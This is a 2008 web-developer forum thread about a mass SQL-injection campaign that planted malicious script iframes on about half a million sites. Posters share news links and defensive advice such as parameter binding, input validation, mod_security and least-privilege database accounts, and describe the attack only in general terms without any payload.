[skyhawk133]

There is a virus being spread through the use of SQL Injection. The SQL Injection inserts an iframe which loads a javascript on the visitors computer and infects the system. If you run a web site, you should look through your logs and traffic to see if there is anything abnormal.

2008-04-28 - No New IIS Or Microsoft SQL Server Vulnerabilities, Despite Claims
http://www.webmaster...net/3636835.htm

2008-04-28 - Half a million sites hit by huge web hack
http://www.techworld...fm?newsid=12100

2008-05-15 - Phishing botnet turns to SQL-injection attack
http://www.techworld...m?newsid=101510

2008-05-05 - Under Attack! Hacker attacked DB with link to virus
http://www.webmaster...net/3641891.htm

2007-11-19 - Avoiding SQL injection attacks without the need to replace words
http://www.webmaster...net/3509272.htm

How To: Protect From SQL Injection in ASP.NET
http://msdn.microsof...y/ms998271.aspx

How To: Protect From Injection Attacks in ASP.NET
http://msdn.microsof...y/bb355989.aspx

Anti-Cross Site Scripting Library
http://msdn.microsof...y/aa973814.aspx


For those of you running an Apache/Linux box, I would HIGHLY recommend installing mod_security with the latest rules.

For the rest of you... fix your damn code.

[RodgerB]

Holy crap!

[Martyr2]

We had a few pages in my company's site hit by this and I had to patch it up for them. It essentially injects an sql statement in binary info and casts it to nvarchar and then executes it. The binary code casted to nvarchar results in a simple insert of a javascript src tag.

Way to prevent it is simply to validate URL parameters and make sure that all parameters are of the right size and type. In addition I make sure that parameters are not more than 100 chars in length which pretty much knocks this sql injection out because the binary string itself is a few hundred chars.

[Mikhail]

None of the sites I know were hit, However that is a large number.

[Sonic88]

We got hit on a site we maintain byt this like 5 times. WE didnt build the site, and are actually in the process of finishing the redesign, but whoever did left the whole damn site wide open. No validation on query strings. A true pain in the ass. The one we got passed in a hex value that when converted ascii was an SQL statement that tries to hit every table in the database. <rant>A true pain in the ass as we were already maxed out on time and now we gotat deal with this cause some "knows enough to be dangerous" web developer codes a vulnerability into every page thats been around for years.</rant>

[PsychoCoder]

Thanks for the heads up Chris! I found a kick ass QueryString validation object, it is written in VB.Net so I'm working on converting it to C#, once that is done I will share it in the form of a tutorial or blog post to help people protect their site against these kind of attacks.

[jjsaw5]

We've been having issues with this.

[joeyadms]

SQL Injections are the scariest holes out there. They are so common, and are extremely critical.

What I always have to explain to people, is this affects server level, the attacker is running commands on your sql server under your privileges.

It's all about escaping the current query, and there are so many vectors and ways to beat filters it's crazy. Especially with MSSQL server and there xp.cmdshell.

It is very probable that someone could gain root on your sql server from this vulnerability.

We need to be escaping all variable data that goes into queries. I always build a wrapper into my database abstraction layer for this. Also, use prepared statements as much as possible, this eliminates all of the worry.

Next is something at application level, like skyhawk said, mod_security works wonders, you just have to be careful. The first time I installed it, I unwittingly grabbed some rules off different sites that were horrible about false positives.

Next, the user you use for your application for your SQL server should have only permissions needed. That way if your compromised, they only have a sandbox to play in.

[mikeblas]

PsychoCoder, on 28 May, 2008 - 07:43 AM, said:

Thanks for the heads up Chris! I found a kick ass QueryString validation object, it is written in VB.Net so I'm working on converting it to C#, once that is done I will share it in the form of a tutorial or blog post to help people protect their site against these kind of attacks.

Why worry about the strings? Just bind your parameters, and you're fine.

[KYA]

I'm sorry, but this bothers me:

effect: noun, something that happens

affect: verb, to make something happen like above

they are different and not interchangeable, example:

SQL Injection Has An Effect On Half Million Sites -- correct
SQL Injection Affects Half Million Sites--correct
SQL Injection Effects Half Million Sites--incorrect

Cool topic about SQL injections, thanks for the post



Sorry for being a grammar nazi

This post has been edited by KYA: 30 May 2008 - 07:21 AM

[skyhawk133]

Fixed.